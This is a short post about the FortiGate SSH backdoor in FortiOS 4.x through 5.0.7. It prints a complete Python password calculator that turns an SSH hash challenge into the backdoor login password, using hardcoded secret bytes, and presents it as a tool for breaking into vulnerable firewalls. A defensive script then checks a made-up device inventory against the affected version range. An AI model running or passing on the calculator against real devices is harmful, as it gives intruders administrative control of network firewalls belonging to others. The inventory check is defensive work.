Fortigate SSH Backdoor Password Calculator



Recently, Fortinet confirmed that there was a backdoor in their firewalls, which impacted FortiGate OS versions 4.x - 5.0.7.

An exploit was released in the wild, but it took some effort to get working because of dependencies such as paramiko/termios/msvcrt.

So theprohack.com's founder, Rishabh Dangwal, ported the code to create a quick and dirty password calculator that helps in breaking into Fortinet firewalls running a vulnerable version.

He tested it on a test firewall and it works perfectly fine.

Here is the code:

# Title    : Fortigate Backdoor Password calculator
# Date    :  24 March 2016
# Author   :  Rishabh Dangwal, original exploit by operator8203@runbox.com.
# Author Homepage  :  www.theprohack.com
# Author Email   :  admin@theprohack.com
# Vendor Homepage :  www.fortinet.com
# Version   :  FortiGate OS Version 4.x -  5.0.7
import base64
import hashlib
print "Enter hash challenge " ; chash = raw_input()
pwdhash = hashlib.sha1()
pwdhash.update('\x00' * 12)
pwdhash.update(chash + 'FGTAbc11*xy+Qqz27')
pwdhash.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
fhash = 'AK1' + base64.b64encode('\x00' * 12 + pwdhash.digest())
print "password is %s" %fhash

Link of Code: https://packetstormsecurity.com/files/136430/Fortigate-Backdoor-Password-Calculator.html
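
For defenders, the affected range stated above (FortiGate OS 4.x through 5.0.7) can be checked against a device inventory. The following is an added example, not part of the original post or of the calculator; the inventory format, hostnames and build numbers are constructed assumptions.

```python
import re

# Affected range as stated on this page: FortiGate OS 4.x through 5.0.7.
FIRST_AFFECTED = (4, 0, 0)
LAST_AFFECTED = (5, 0, 7)

# Assumed firmware field format, e.g. "v5.0.7,build3608" or "4.3.16".
VERSION_RE = re.compile(r"\s*v?(\d+)\.(\d+)\.(\d+)")


def parse_version(version_field):
    """Return (major, minor, patch), or None if the field has no full version."""
    m = VERSION_RE.match(version_field)
    return tuple(int(p) for p in m.groups()) if m else None


def classify(version_field):
    """Classify one firmware string against the page's affected range."""
    v = parse_version(version_field)
    if v is None:
        return "unknown"  # needs a manual check rather than a guess
    return "affected" if FIRST_AFFECTED <= v <= LAST_AFFECTED else "not-affected"


def triage(inventory_lines):
    """Map hostname -> status for lines of the form 'hostname,firmware'."""
    report = {}
    for line in inventory_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, version_field = line.partition(",")
        report[name.strip()] = classify(version_field)
    return report


# Constructed sample inventory (not real devices or real build numbers).
SAMPLE_INVENTORY = """\
# hostname,firmware
fw-edge-01,v5.0.7,build3608
fw-edge-02,v5.0.8,build0291
fw-branch-03,v4.3.16,build0686
fw-dc-04,v5.2.3,build0670
fw-lab-05,unknown
""".splitlines()

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

Devices reported as "affected" or "unknown" are the ones to prioritise for a firmware upgrade and for restricting SSH access on their management interfaces.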


